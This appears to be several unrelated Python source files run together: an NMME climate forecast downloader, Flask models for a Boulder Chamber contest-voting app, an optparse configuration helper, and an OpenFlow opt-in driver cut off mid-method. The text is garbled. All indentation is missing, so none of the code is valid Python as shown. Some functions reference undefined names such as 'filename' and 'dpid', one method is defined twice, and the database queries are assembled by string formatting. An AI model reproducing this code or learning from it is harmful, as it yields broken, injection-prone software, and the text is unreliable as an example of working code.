"""Downloads NMME ensemble forecast data from the SERVIR ClimateSERV
data server, and imports them into the database *dbname*. Optionally uses
a bounding box to limit the region with [minlon, minlat, maxlon, maxlat]."""
log = logging.getLogger(__name__)
nens = 10
varnames = ["Precipitation", "Temperature"]
outpath = tempfile.mkdtemp()
for varname in varnames:
for e in range(nens):
configfile = _writeCservConfig(bbox, dts[0], dts[-1], varname, e+1)
proc = subprocess.Popen(["python", "{0}/ClimateSERV_API_Access.py".format(rpath.scripts), "-config", configfile, "-outfile", "{0}/{1}_{2}.zip".format(outpath, varname, e+1)], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, err = proc.communicate()
log.debug(out)
f = zipfile.ZipFile("{0}/{1}_{2}.zip".format(outpath, varname, e+1))
filenames = filter(lambda s: s.endswith("tif"), f.namelist())
f.extractall(outpath, filenames)
for filename in filenames:
dt = datetime.strptime(filename.split("_")[-1][1:-4], "%Y%m%d")
if varname == "Temperature":
# convert from Kelvin to Celsius
proc = subprocess.Popen(["gdal_calc.py", "-A", "{0}/{1}".format(outpath, filename), "--calc=A-273.15", "--outfile={0}/C{1}".format(outpath, filename)])
out, err = proc.communicate()
log.debug(out)
filename = "C" + filename
ingest(dbname, varname, "{0}/{1}".format(outpath, filename), dt, e+1)
os.remove(configfile)
shutil.rmtree(outpath)
def _queryDataset(dbname, tablename, name, startyear, startmonth, startday, endyear, endmonth, endday, ens=None):
"""Retrieve meteorological forcing dataset from database."""
temptable = ''.join(random.SystemRandom().choice(string.ascii_letters) for _ in range(8))
if ens is None:
sql = "create table {0}_xy as (select gid,st_worldtorastercoordx(rast,geom) as x,st_worldtorastercoordy(rast,geom) as y,rid as tile from {4},{5}.basin where fdate=date'{1}-{2}-{3}' and st_intersects(rast,geom))".format(temptable, startyear, startmonth, startday, tablename, name)
else:
sql = "create table {0}_xy as (select gid,st_worldtorastercoordx(rast,geom) as x,st_worldtorastercoordy(rast,geom) as y,rid as tile from {4},{5}.basin where fdate=date'{1}-{2}-{3}' and st_intersects(rast,geom) and ensemble={6})".format(temptable, startyear, startmonth, startday, tablename, name, ens)
db = dbio.connect(dbname)
cur = db.cursor()
cur.execute(sql)
cur.execute("create index {0}_xy_r on {0}_xy(tile)".format(temptable))
db.commit()
if ens is None:
sql = "select gid,fdate,st_nearestvalue(rast,x,y) from {0},{1}_xy where rid=tile and fdate>=date'{2}-{3}-{4}' and fdate<=date'{5}-{6}-{7}' order by gid,fdate".format(tablename, temptable, startyear, startmonth, startday, endyear, endmonth, endday)
else:
sql = "select gid,fdate,st_nearestvalue(rast,x,y) from {0},{1}_xy where rid=tile and fdate>=date'{2}-{3}-{4}' and fdate<=date'{5}-{6}-{7}' and ensemble={8} order by gid,fdate".format(tablename, temptable, startyear, startmonth, startday, endyear, endmonth, endday, ens)
cur.execute(sql)
data = [r for r in cur.fetchall()]
cur.execute("drop table {0}_xy".format(temptable))
db.commit()
cur.close()
db.close()
return data
def _getForcings(options, models, res):
"""Retrieve meteorological forcings for ensemble."""
nens = len(models)
db = dbio.connect(models.dbname)
cur = db.cursor()
rtables = dbio.getResampledTables(models.dbname, options, res)
rsmp = rtables['precip'].split("_")[1]
prec = [None] * nens
tmax = [None] * nens
tmin = [None] * nens
temp = [None] * nens
for e in range(nens):
prec[e] = _queryDataset(models.dbname, "precip.nmme_{0}".format(rsmp), models.name, models.startyear, models.startmonth, models.startday, models.endyear, models.endmonth, models.endday, e+1)
temp[e] = _queryDataset(models.dbname, "tmax.nmme_{0}".format(rsmp), models.name, models.startyear, models.startmonth, models.startday, models.endyear, models.endmonth, models.endday, e+1)
sql = "select distinct(date_part('year',fdate)) from tmax.{0}".format(rtables['tmax'])
cur.execute(sql)
years = [r[0] for r in cur.fetchall()]
if len(years) > 2:
years.remove(min(years))
years.remove(max(years))
if len(years) > 0:
ndays = (datetime(models.endyear, models.endmonth, models.endday) - datetime(models.startyear, models.startmonth, models.startday)).days
yr = int(np.random.choice(years))
t0 = datetime(yr, models.startmonth, models.startday)
t1 = t0 + timedelta(ndays)
vtmax = _queryDataset(models.dbname, "tmax.{0}".format(rtables['tmax']), models.name, t0.year, t0.month, t0.day, t1.year, t1.month, t1.day)
vtmin = _queryDataset(models.dbname, "tmin.{0}".format(rtables['tmin']), models.name, t0.year, t0.month, t0.day, t1.year, t1.month, t1.day)
wind = _queryDataset(models.dbname, "wind.{0}".format(rtables['wind']), models.name, t0.year, t0.month, t0.day, t1.year, t1.month, t1.day)
for e in range(nens):
tmax[e] = [(vtmax[i][0], vtmax[i][1], temp[e][i][2] + 0.5 * (vtmax[i][2] - vtmin[i][2])) for i in range(len(vtmax))]
tmin[e] = [(vtmin[i][0], vtmin[i][1], temp[e][i][2] - 0.5 * (vtmax[i][2] - vtmin[i][2])) for i in range(len(vtmin))]
else:
prec = tmax = tmin = wind = None
return prec, tmax, tmin, wind
def generate(options, models):
"""Generate meteorological forecast forcings from downscaled NMME data."""
log = logging.getLogger(__name__)
options['vic']['tmax'] = options['vic']['temperature']
options['vic']['tmin'] = options['vic']['temperature']
db = dbio.connect(models.dbname)
cur = db.cursor()
dt0 = datetime(models.startyear, models.startmonth, models.startday)
dt1 = datetime(models.endyear, models.endmonth, models.endday)
# check if forecast period exists in NMME data
sql = "select count(distinct(fdate)) from precip.nmme where fdate>=date'{0}' and fdate<=date'{1}'".format(dt0.strftime("%Y-%m-%d"), dt1.strftime("%Y-%m-%d"))
cur.execute(sql)
ndata = cur.fetchone()[0]
if ndata == (dt1 - dt0).days + 1:
prec, tmax, tmin, wind = _getForcings(options, models, models.res)
if tmax is None or tmin is None or wind is None:
log.error("No data found to generate VIC forcings for NMME forecast. Exiting...")
sys.exit()
else:
for e in range(len(models)):
models[e].writeForcings(prec[e], tmax[e], tmin[e], wind)
else:
log.error("Not enough data found for requested forecast period! Exiting...")
sys.exit()
cur.close()
db.close()
| |
# -*- coding: utf-8 -*-
""" contest models: Contest, Contestant, Donor, and Founder
:copyright: Copyright (c) 2014 Bivio Software, Inc. All Rights Reserved.
:license: Apache, see LICENSE for more details.
"""
import decimal
import flask
import random
import re
import sqlalchemy.orm
import string
import werkzeug.exceptions
from ..debug import pp_t
from .. import biv
from .. import common
from .. import controller as ppc
from ..contest import model as pcm
from ..auth import model as pam
from ..controller import db
from .. import ppdatetime
_SEND_INVITE_MAIL_SUBJECT = '2017 Esprit Venture Challenge Voting Link'
_SEND_INVITE_SMS_BODY = 'Vote at {contest} here: {uri}'
_SEND_INVITE_MAIL_BODY = '''Dear Esprit Entrepreneur Attendee:
Thank you for attending the Boulder Chamber's 33rd annual Esprit Entrepreneur
tonight. After the competition, please help choose the 2017 Esprit Venture
Challenge winner. Your personal voting link is:
{uri}
This link may only be used one time and will go live at 7:00pm.
Thank you for celebrating entrepreneurship in Boulder and helping select the winner
of the $10,000 prize. Any questions can be directed to Corine Waldau
at corine.waldau@boulderchamber.com.
Cheers,
Boulder Chamber Staff
'''
def is_email(v):
"""Only works for validated emails; Differentiating from phone"""
return '@' in v
def validate_email_or_phone(value):
import pyisemail
v = re.sub(r'\s+', '', value or '')
if v is None or len(v) == 0:
return None, 'please enter an email or phone'
if pyisemail.is_email(v):
return v.lower(), None
if is_email(v):
return None, 'invalid email'
v = re.sub(r'\D', '', v)
if len(v) == 10:
return '({}) {}-{}'.format(v[0:3], v[3:6], v[6:]), None
return None, 'invalid phone'
def _datetime_column():
return db.Column(db.DateTime(timezone=False), nullable=False)
class E15Contest(db.Model, pcm.ContestBase):
"""contest database model.
"""
biv_id = db.Column(
db.Numeric(18),
db.Sequence('e15contest_s', start=1015, increment=1000),
primary_key=True
)
time_zone = db.Column(db.String, nullable=False)
event_voting_end = _datetime_column()
event_voting_start = _datetime_column()
judging_end = _datetime_column()
judging_start = _datetime_column()
public_voting_end = _datetime_column()
public_voting_start = _datetime_column()
submission_end = _datetime_column()
submission_start = _datetime_column()
def contest_info(self):
winner = self._winner_biv_id()
# TODO: check to make sure show*/is* aren't conflicting (one second overlap)
# need to detect transtions. If there are no finalists, but showFinalists, then
# compute finalists. Probably just want this on any contest page.
semiFinalistCount = self._count(E15Nominee.is_semi_finalist)
finalistCount = self._count(E15Nominee.is_finalist)
return {
'contestantCount': len(self.public_nominees()),
'displayName': self.display_name,
'finalistCount': finalistCount,
'isEventRegistration': ppdatetime.now_in_range(self.submission_start, self.event_voting_end),
'isEventVoting': self.is_event_voting(),
'isExpired': self.is_expired(),
'isJudging': self.is_judging(),
'isNominating': self.is_nominating(),
'isPreNominating': ppdatetime.now_before_start(self.submission_start),
'isPublicVoting': self.is_public_voting(),
'semiFinalistCount': semiFinalistCount,
'showAllContestants': ppdatetime.now_in_range(self.submission_start, self.public_voting_end),
'showFinalists': ppdatetime.now_in_range(self.judging_end, self.event_voting_end) and finalistCount > 0,
'showSemiFinalists': ppdatetime.now_in_range(self.public_voting_end, self.judging_end) and semiFinalistCount > 0,
'showWinner': bool(winner),
'winner_biv_id': winner,
}
def get_finalists(self):
return E15Nominee.query.select_from(pam.BivAccess).filter(
pam.BivAccess.source_biv_id == self.biv_id,
pam.BivAccess.target_biv_id == E15Nominee.biv_id,
E15Nominee.is_finalist == True,
).order_by(E15Nominee.display_name).all()
def is_event_voting(self):
return ppdatetime.now_in_range(self.event_voting_start, self.event_voting_end)
def is_expired(self):
return ppdatetime.now_after_end(self.event_voting_end)
def is_judge(self):
if self.is_judging():
return super(E15Contest, self).is_judge()
return False
def is_judging(self):
return ppdatetime.now_in_range(self.judging_start, self.judging_end)
def is_nominating(self):
return ppdatetime.now_in_range(self.submission_start, self.submission_end);
def is_public_voting(self):
return ppdatetime.now_in_range(self.public_voting_start, self.public_voting_end)
def is_semi_finalist_submitter(self):
return len(E15Contest.semi_finalist_nominees_for_user(self)) > 0
def nominee_pending_for_user(self):
access_alias = sqlalchemy.orm.aliased(pam.BivAccess)
for n in E15Nominee.query.select_from(pam.BivAccess, access_alias).filter(
pam.BivAccess.source_biv_id == self.biv_id,
pam.BivAccess.target_biv_id == E15Nominee.biv_id,
pam.BivAccess.target_biv_id == access_alias.target_biv_id,
access_alias.source_biv_id == flask.session['user.biv_id'],
).all():
# Only should be one public application at a time
if not (n.is_valid and n.is_public):
return n, True
return E15Nominee(), False
def public_nominees(self):
return E15Nominee.query.select_from(pam.BivAccess).filter(
pam.BivAccess.source_biv_id == self.biv_id,
pam.BivAccess.target_biv_id == E15Nominee.biv_id,
E15Nominee.is_public == True,
).all()
def semi_finalist_nominees_for_user(self):
if not flask.session.get('user.is_logged_in'):
return []
access_alias = sqlalchemy.orm.aliased(pam.BivAccess)
return E15Nominee.query.select_from(pam.BivAccess, access_alias).filter(
pam.BivAccess.source_biv_id == self.biv_id,
pam.BivAccess.target_biv_id == E15Nominee.biv_id,
pam.BivAccess.target_biv_id == access_alias.target_biv_id,
access_alias.source_biv_id == flask.session['user.biv_id'],
E15Nominee.is_semi_finalist == True,
).all()
def tally_all_scores(self):
res = []
total_votes = 0
total_rank_scores = 0
for nominee in self.public_nominees():
ranks = nominee.get_judge_ranks()
vote_score = nominee.tally_votes()
total_votes += vote_score
rank_score = nominee.tally_judge_ranks()
total_rank_scores += rank_score
res.append({
'biv_id': nominee.biv_id,
'display_name': nominee.display_name,
'judge_ranks': '( {} )'.format(', '.join(map(str, ranks))),
'votes': vote_score,
'judge_score': rank_score,
})
return res
def admin_event_votes(self):
nominees = {}
for f in self.get_finalists():
nominees[f.biv_id] = dict(
display_name=f.display_name,
count=0,
)
votes = []
total_votes = 0
total_votes_used = 0
for vae in E15VoteAtEvent.query.filter(
E15VoteAtEvent.contest_biv_id == self.biv_id,
).order_by(
E15VoteAtEvent.invite_email_or_phone,
).all():
v = dict(invite_email_or_phone=vae.invite_email_or_phone, nominee='')
total_votes += 1
if vae.nominee_biv_id:
total_votes_used += 1
n = nominees[vae.nominee_biv_id]
n['count'] += 1
v['nominee'] = n['display_name']
votes.append(v)
return dict(
nominees=sorted(
nominees.values(),
key=lambda x: x['count'],
reverse=True,
),
total_votes=total_votes,
total_votes_used=total_votes_used,
votes=votes,
contest=self.display_name,
)
def tally_all_scores(self):
res = []
total_votes = 0
total_rank_scores = 0
for nominee in self.public_nominees():
ranks = nominee.get_judge_ranks()
vote_score = nominee.tally_votes()
total_votes += vote_score
rank_score = nominee.tally_judge_ranks()
total_rank_scores += rank_score
res.append({
'biv_id': nominee.biv_id,
'display_name': nominee.display_name,
'judge_ranks': '( {} )'.format(', '.join(map(str, ranks))),
'votes': vote_score,
'judge_score': rank_score,
})
return res
def _count(self, field):
return E15Nominee.query.select_from(pam.BivAccess).filter(
pam.BivAccess.source_biv_id == self.biv_id,
pam.BivAccess.target_biv_id == E15Nominee.biv_id,
field == True,
).count()
def _winner_biv_id(self):
res = E15Nominee.query.select_from(pam.BivAccess).filter(
pam.BivAccess.source_biv_id == self.biv_id,
pam.BivAccess.target_biv_id == E15Nominee.biv_id,
E15Nominee.is_winner == True,
).first()
return res.biv_id if res else None
class E15EventVoter(db.Model, common.ModelWithDates):
"""event voter database mode.
"""
__tablename__ = 'e15_event_voter'
contest_biv_id = db.Column(db.Numeric(18), primary_key=True)
user_email = db.Column(db.String(100), nullable=False, primary_key=True)
nominee_biv_id = db.Column(db.Numeric(18))
class E15Nominee(db.Model, pcm.NomineeBase):
"""nominatee database model.
"""
biv_id = db.Column(
db.Numeric(18),
db.Sequence('e15nominee_s', start=1016, increment=1000),
primary_key=True
)
is_valid = db.Column(db.Boolean, nullable=False)
youtube_code = db.Column(db.String(500))
contact_phone = db.Column(db.String(20))
contact_address = db.Column(db.String(100))
nominee_desc = db.Column(db.String)
is_semi_finalist = db.Column(db.Boolean, nullable=False)
is_finalist = db.Column(db.Boolean, nullable=False)
is_winner = db.Column(db.Boolean, nullable=False)
def assert_is_public_or_404(self):
if not self.is_public:
werkzeug.exceptions.abort(404)
def contest(self):
return E15Contest.query.select_from(pam.BivAccess).filter(
pam.BivAccess.source_biv_id == E15Contest.biv_id,
pam.BivAccess.target_biv_id == self.biv_id,
).first_or_404()
def submitter(self):
return pam.User.query.select_from(pam.BivAccess).filter(
pam.BivAccess.source_biv_id == pam.User.biv_id,
pam.BivAccess.target_biv_id == self.biv_id,
).first_or_404()
def tally_judge_ranks(self):
score = 0
for rank in self.get_judge_ranks():
score += (pcm.JudgeRank.MAX_RANKS + 1) - rank
return score
def tally_votes(self):
count = 0
for vote in self.get_votes():
if vote.vote_status == '1x':
count += 1
elif vote.vote_status == '2x':
count += 2
return count
def _invite_nonce():
# SystemRandom is cryptographically secure
return ''.join(
random.SystemRandom().choice(string.ascii_lowercase) for _ in range(24)
)
class E15VoteAtEvent(db.Model, common.ModelWithDates):
"""An event vote token
"""
_NONCE_ATTR = 'vote_at_event.invite_nonce'
biv_id = db.Column(
db.Numeric(18),
db.Sequence('e15_vote_at_event_s', start=1019, increment=1000),
primary_key=True
)
contest_biv_id = db.Column(
db.Numeric(18), db.ForeignKey('e15_contest.biv_id'), nullable=False)
contest = db.relationship('E15Contest')
invite_email_or_phone = db.Column(db.String(100), nullable=False)
# Bit larger than _invite_nonce()
invite_nonce = db.Column(db.String(32), unique=True, default=_invite_nonce)
invites_sent = db.Column(db.Integer, nullable=False, default=0)
nominee_biv_id = db.Column(db.Numeric(18), nullable=True)
remote_addr = db.Column(db.String(32), nullable=True)
user_agent = db.Column(db.String(100), nullable=True)
# Logged in user at the time of vote, may be meaningless
user_biv_id = db.Column(db.Numeric(18), nullable=True)
@classmethod
def create_unless_exists(cls, contest, invite_email_or_phone):
query=dict(
contest_biv_id=contest.biv_id,
invite_email_or_phone=invite_email_or_phone,
)
self = cls.query.filter_by(**query).first()
if self:
return self, False
self = cls(**query)
ppc.db.session.add(self)
ppc.db.session.flush()
ppc.db.session.add(
pam.BivAlias(
biv_id=self.biv_id,
alias_name=self.invite_nonce,
),
)
return self, True
def save_to_session(self):
flask.session[self._NONCE_ATTR] = self.invite_nonce
def send_invite(self, force):
"""Email or SMS voting link"""
uri = self.format_absolute_uri()
if (
self.invites_sent > 0 and not force
or self.invites_sent >= ppc.app().config['PUBLICPRIZE']['MAX_INVITES_SENT']
):
pp_t('NOT sending to={} uri={}', [self.invite_email_or_phone, uri])
return None
pp_cfg = ppc.app().config['PUBLICPRIZE']
assert pp_cfg['TEST_MODE'] or not re.search('/localhost|/127', uri), \
'uri={}: uri contains local host'
pp_t('to={} uri={}', [self.invite_email_or_phone, uri])
msg_args = dict(
contest=self.contest.display_name,
uri=uri,
)
if pp_cfg['MAIL_SUPPRESS_SEND']:
pp_t('MAIL_SUPPRESS_SEND=True')
if is_email(self.invite_email_or_phone):
import flask_mail
msg = flask_mail.Message(
subject=_SEND_INVITE_MAIL_SUBJECT.format(**msg_args),
sender=(self.contest.display_name, pp_cfg['SUPPORT_EMAIL']),
recipients=[self.invite_email_or_phone],
body=_SEND_INVITE_MAIL_BODY.format(**msg_args),
)
ppc.mail().send(msg)
else:
import twilio.rest
cfg = pp_cfg['TWILIO']
c = twilio.rest.TwilioRestClient(**cfg['auth'])
sms_args = dict(
to=self.invite_email_or_phone,
from_=cfg['from'],
body=_SEND_INVITE_SMS_BODY.format(**msg_args),
)
if not pp_cfg['MAIL_SUPPRESS_SEND']:
c.sms.messages.create(**sms_args)
self.invites_sent += 1
return uri
@classmethod
def validate_session(cls, contest):
i = flask.session.get(cls._NONCE_ATTR)
if not i:
pp_t('no invite_nonce')
return False, None
self = cls.query.filter_by(invite_nonce=i).first()
if not self:
pp_t('invite nonce not found, another db?')
return False, None
if self.contest_biv_id != contest.biv_id:
pp_t(
'nonce={} expect_contest={} actual_contest={}',
[i, contest.biv_id, self.contest_biv_id],
)
return False, None
return True, self
E15Contest.BIV_MARKER = biv.register_marker(15, E15Contest)
E15Nominee.BIV_MARKER = biv.register_marker(16, E15Nominee)
E15VoteAtEvent.BIV_MARKER = biv.register_marker(19, E15VoteAtEvent)
| |
"""A file-backed declarative layer on optparse.
This module allows the user to register command line options, and to load them
in bulk from a configuration file.
>>> class Config(Configuration):
... debug = BoolOption('Enable debugging.', default=False)
... debug_level = IntOption('Debug level 0 <= n <= 9.', default=0)
... db = URIOption('Database URI.')
>>> config = Config(args=['--debug=true', '--db=mysql://localhost/db'])
>>> config
{'debug': True, 'debug_level': 0, 'db': URI(u'mysql://localhost/db')}
>>> config.debug
True
>>> config.db
URI(u'mysql://localhost/db')
"""
from __future__ import with_statement
import optparse
import sys
from flam.util import to_boolean, to_list, URI
__all__ = ['Configuration', 'Option', 'IntOption', 'FloatOption', 'ListOption',
'BoolOption']
class Option(object):
"""A configuration option."""
def __init__(self, help, default=None, *args, **kwargs):
self.args = args
kwargs['help'] = help
kwargs['default'] = default
self.init_kwargs(kwargs)
self.kwargs = kwargs
def init_kwargs(self, kwargs):
"""Hook for initialising keyword arguments to optparse.Option()."""
kwargs.setdefault('action', 'store')
def to_optparse_option(self, name):
flag = '--' + name
option = optparse.Option(flag, *self.args, **self.kwargs)
return option
class ConvertingOption(Option):
"""A virtual base Option that performs type conversion."""
def convert(self, value):
"""Override this to convert an option."""
raise NotImplementedError
def init_kwargs(self, kwargs):
def convert(option, opt_str, value, parser):
setattr(parser.values, opt_str[2:], self.convert(value))
kwargs.update(dict(
type='string',
action='callback',
callback=convert,
))
class IntOption(Option):
"""An integer option.
>>> class Config(Configuration):
... age = IntOption('Age.')
>>> config = Config(args=['--age=34'])
>>> config.age
34
"""
def init_kwargs(self, kwargs):
kwargs['type'] = 'int'
class FloatOption(Option):
"""A floating point option."""
def init_kwargs(self, kwargs):
kwargs['type'] = 'float'
class BoolOption(ConvertingOption):
"""A boolean option.
>>> class Config(Configuration):
... alive = BoolOption('Alive?')
>>> config = Config(args=['--alive=true'])
>>> config.alive
True
"""
def convert(self, value):
return to_boolean(value)
class URIOption(ConvertingOption):
"""A URI option.
The value will be a flam.util.URI object.
>>> class Config(Configuration):
... db = URIOption('Database connection.')
>>> config = Config(args=['--db=mysql://localhost:5001/db'])
>>> config.db
URI(u'mysql://localhost:5001/db')
"""
def convert(self, value):
return URI(value)
class ListOption(ConvertingOption):
"""An option with a list of values.
>>> class Config(Configuration):
... names = ListOption('Names.')
>>> config = Config(args=['--names=bob,alice'])
>>> config.names
['bob', 'alice']
"""
def __init__(self, *args, **kwargs):
self.sep = kwargs.pop('sep', ',')
self.keep_empty = kwargs.pop('keep_empty', False)
super(ListOption, self).__init__(*args, **kwargs)
def convert(self, value):
return to_list(value, sep=self.sep, keep_empty=self.keep_empty)
class Configuration(object):
"""Configuration container object.
Configuration options are declared as class attributes. Options can be
defined in a configuration file or via command line flags.
"""
def __init__(self, file=None, args=None, **kwargs):
"""Create a new Configuration object.
:param file: File-like object or filename to load configuration from.
:param args: Command-line arguments, excluding argv[0]. sys.argv will
be used if omitted.
:param kwargs: Extra keyword arguments to pass to the OptionParser
constructor.
"""
options = self._collect_options()
self._parser = optparse.OptionParser(option_list=options, **kwargs)
self._parser.add_option(
'--config', help='Configuration file to load.',
default=filename, action='store',
)
defaults = dict((option.dest, option.default) for option in options)
self._values = optparse.Values(defaults)
if filename is not None:
self.read(filename)
# TODO(alec) We should preserve args somewhere...
_, args = self._parser.parse_args(args or sys.argv[1:], values=self._values)
def read(self, file):
"""Read option configuration from a file-like object or a filename.
>>> class Config(Configuration):
... age = IntOption('Age.')
>>> from StringIO import StringIO
>>> conf_file = StringIO('age=10')
>>> config = Config(conf_file)
>>> config.age
10
"""
file_args = self._read_args(file)
self._parser.parse_args(file_args, values=self._values)
def __repr__(self):
return repr(self._values.__dict__)
def _collect_options(self):
options = []
for name, value in self.__class__.__dict__.items():
if isinstance(value, Option):
value = value.to_optparse_option(name)
elif isinstance(value, optparse.Option):
pass
else:
continue
options.append(value)
return options
def _read_args(self, file):
args = []
if isinstance(file, basestring):
file = open(file)
try:
for line in file:
line = line.strip()
if not line or line.startswith('#'):
continue
key, value = line.split('=', 1)
args.append('--' + key.strip())
args.append(value.strip())
return args
finally:
file.close()
if __name__ == '__main__':
import doctest
doctest.testmod()
| |
from am.rspecs.src.geni.v3.openflow.container.group import Group
from am.rspecs.src.geni.v3.openflow.container.match import Match
from am.rspecs.src.geni.v3.openflow.container.flowspace import FlowSpace
from am.rspecs.src.geni.v3.openflow.container.dpid import DPID
from am.rspecs.src.geni.v3.openflow.container.link import Link
from am.rspecs.src.geni.v3.openflow.container.port import Port
from am.rspecs.src.geni.v3.openflow.container.controller import Controller
from geniutils.src.xrn.xrn import hrn_to_urn
from geniutils.src.xrn.xrn import urn_to_hrn
from openflow.optin_manager.opts.models import Experiment
#from openflow.optin_manager.opts.models import ExperimentFLowSpace
from openflow.optin_manager.opts.models import Reservation
from openflow.optin_manager.opts.models import ReservationFlowSpace
from openflow.optin_manager.opts.models import ExpiringFlowSpaces
from openflow.optin_manager.geni.v3.utils.optin import OptinUtils
from openflow.optin_manager.geni.v3.utils.sliver import SliverUtils
from openflow.optin_manager.geni.v3.utils.flowvisor import FlowVisorWrap
from openflow.optin_manager.xmlrpc_server.models import FVServerProxy
import threading
import copy
import uuid
import traceback
from datetime import datetime
from datetime import timedelta
import dateutil.parser
import re
class OptinDriver:
def __init__(self):
self.__geni_best_effort_mode = True
self.__mutex = threading.Lock()
self.GENI_ALLOCATED = "geni_allocated"
self.GENI_UNALLOCATED = "geni_unallocated"
self.GENI_PROVISIONED = "geni_provisioned"
self.GENI_READY = "geni_ready"
self.GENI_NOT_READY = "geni_notready"
self.GENI_CONFIGURING = "geni_configuring"
self.GENI_FAILED = "geni_failed"
self.PENDING_OF_PROVISION = "Pending of Provisioning"
self.PENDINF_OF_APPROVAL = "Pending of Approval"
self.__config = None
self.__sliver_manager = SliverUtils
def get_version(self):
#TODO Add F4F Extensions
#TODO Add FELIX Extesions, if any
return {"urn" : self.__generate_component_manager_id()}
def get_specific_devices(self, urn,geni_available=True):
try:
urn = self.__generate_sliver_urn_from_slice_urn(urn)
#flowspace = FlowSpace()
#exps = ExperimentFLowSpace.objects.filter(slice_urn = urn)
#exp = exps[0].exp
#return self.__parse_to_fs_object(urn, exp, exps)
return self.__convert_to_resource(urn)
except:
traceback.print_exc()
def __get_specific_devices(self, urn, geni_available=True):
fv_wrap = FlowVisorWrap()
fspaces = fv_wrap.flow_space_by_slice(urn)
formatted_fs = dict()
for fs in fspaces:
if fs[dpid] in formatted_fs.keys():
if not fs["match"]["in_port"] in formatted_fs[dpid]["ports"]:
formatted_fs[dpid]["ports"].append(fs["match"]["in_port"])
if not fs["match"]["headers"] in formatted_fs[dpid]["match"]:
formatted_fs[dpid]["match"].append(fs["match"]["headers"])
else:
formatted_fs[dpid]["ports"] = [fs["match"]["in_port"]]
formatted_fs[dpid]["matches"] = [fs["match"]["headers"]]
flowspace = self.__flowvisor_fs_to_instance(formatted_fs)
def __flowvisor_fs_to_instance(self, fs_dict):
flowspace = FlowSpace()
group = Group()
for datapath in fs_dict.keys():
dpid = DPID()
dpid.datapath = datapath
for port in fs_dict[datapath]["ports"]:
of_port = Port()
of_port.set_num(port)
dpid.add_port(of_port)
group.add_dpid(dpid)
for match in fs_dict[datapath]["matches"]:
of_match = Match()
if match.has_key("dl_vlan"):
of_match.add_dl_vlan(match["dl_vlan"])
group.add_match(of_match)
flowspace.set_group(group)
return flowspace
def get_all_devices(self, geni_available = True):
devices = list()
devices.extend(self.__get_switches())
devices.extend(self.__get_links())
return devices
def create_flowspace(self, urn, expiration=None, users=list(), geni_best_effort=True):
try:
urn = self.__generate_sliver_urn_from_slice_urn(urn)
params = self.__urn_to_fs_params(urn)
#res = Reservation.objects.filter(slice_urn=urn)[0]
res = Reservation.objects.filter(**params)
if not res:
raise Exception("Sliver not found or already allocated")
res = res[0]
rfs = res.reservationflowspace_set.all()
slivers = self.__get_create_slice_params(rfs)
self.__sliver_manager.create_of_sliver(urn, res.project_name, res.project_desc, res.slice_name, res.slice_desc, res.controller_url, res.owner_email, res.owner_password, slivers)
ExpiringFlowSpaces(slice_urn=urn, expiration=expiration).save()
expirii = ExpiringFlowSpaces.objects.filter(slice_urn=urn, expiration=expiration)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print "Expiration: ", expiration
if expirii:
print("ExpiringFlowSpaces: ", ExpiringFlowSpaces.objects.filter(slice_urn=urn, expiration=expiration)[0].__dict__)
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
manifest = self.__convert_to_resource(urn, expiration)
rfs.delete()
res.delete()
except Exception as e:
print(traceback.print_exc())
raise e
#manifest = self.__convert_to_resource(urn)
return manifest
def reserve_flowspace(self, slice_urn, reservation, expiration=None, users=list()):
try:
if not expiration:
expiration = datetime.utcnow() + timedelta(hours=1)
reservation_params = self.__get_experiment_params(reservation, slice_urn)
#reservation_params['slice_urn'] = slice_urn
# Delete first any other reservation by this name
reservation_params_filter = copy.deepcopy(reservation_params)
# Remove slice_id key (changes for every allocation)
reservation_params_filter.pop("slice_id")
# Delete previous reservations
Reservation.objects.filter(**reservation_params_filter).delete()
r = Reservation(**reservation_params)
r.expiration = expiration
r.save()
for group in reservation.get_groups():
# Filter to fetch only resources from this Component Manager ID
for dpid in group.get_dpids():
# URNs of foreign RMs are not served
current_cm_urn = self.__config.CM_HRN.replace(".", ":")
cm_id = getattr(dpid, "get_component_manager_id")
if callable(cm_id):
cm_id = cm_id()
# If current DPID does not belong to the current facility, skip
if current_cm_urn not in cm_id:
continue
for port in dpid.get_ports():
for match in group.get_matches():
req_params = self.__translate_to_flow_space_model(match, dpid, port)
for param in req_params:
param = self.__format_params_to_reservation_model(param)
reservation_flowspace = ReservationFlowSpace(**param)
reservation_flowspace.dpid = dpid.get_datapath()
reservation_flowspace.res = r
reservation_flowspace.expiration = expiration
reservation_flowspace.slice_urn = slice_urn
reservation_flowspace.save()
except Exception as e:
print(traceback.print_exc())
raise e
reservation.set_urn(reservation_params["slice_urn"])
reservation.set_state("Pending of Provision")
reservation.set_expiration(expiration)
reservation.set_allocation_status(self.GENI_ALLOCATED)
reservation.set_operational_status(self.GENI_NOT_READY)
return reservation
def renew_fs(self, urn, expiration):
urn = self.__generate_sliver_urn_from_slice_urn(urn)
flowspaces = ExpiringFlowSpaces.objects.filter(slice_urn=urn)
# if flowspaces:
# flowspace = flowspaces[0]
for flowspace in flowspaces:
flowspace.expiration = expiration
flowspace.save()
return self.__convert_to_resource(urn, expiration)
else:
reservations = Reservation.objects.filter(slice_urn=urn)
# if reservations:
#reservation = reservations[0]
for reservation in reservations:
reservation.expiration = expiration
reservation.save()
return self.__convert_to_resource(urn, expiration)
raise Exception("Sliver not Found")
def start_flow_space(self, urn):
return self.__crud_flow_space(urn, "start")
def stop_flow_space(self, urn):
return self.__crud_flow_space(urn, "stop")
def reboot_flow_space(self, urn):
return self.__crud_flow_space(urn, "reboot")
def delete_flow_space(self, urn):
return self.__crud_flow_space(urn, "delete")
def get_geni_best_effort_mode(self):
return self.__geni_best_effort_mode
def set_geni_best_effort_mode(self, value):
self.__geni_best_effort_mode = value
def __get_geni_status(self, urn):
urn = self.__generate_sliver_urn_from_slice_urn(urn)
exps = Experiment.objects.filter(slice_urn=urn)
if exps:
exp_fss = exps[0].experiementflowspace_set.all()
opts = exps[0].useropts_set.all()
opts_fs = opts[0].optsflowspace_set.all()
if len(opts_fs) == len(exp_fss):
return self.GENI_READY, self.GENI_PROVISIONED
else:
return self.GENI_NOT_READY, self.GENI_PROVISIONED
res = Reservation.objects.filter(slice_urn = urn)
if res:
return self.GENI_NOT_READY, self.GENI_ALLOCATED
raise Exception("Slice Does Not Exists")
def __crud_flow_space(self, urn, action):
"""
PerformOperationalAction-related logic.
"""
try:
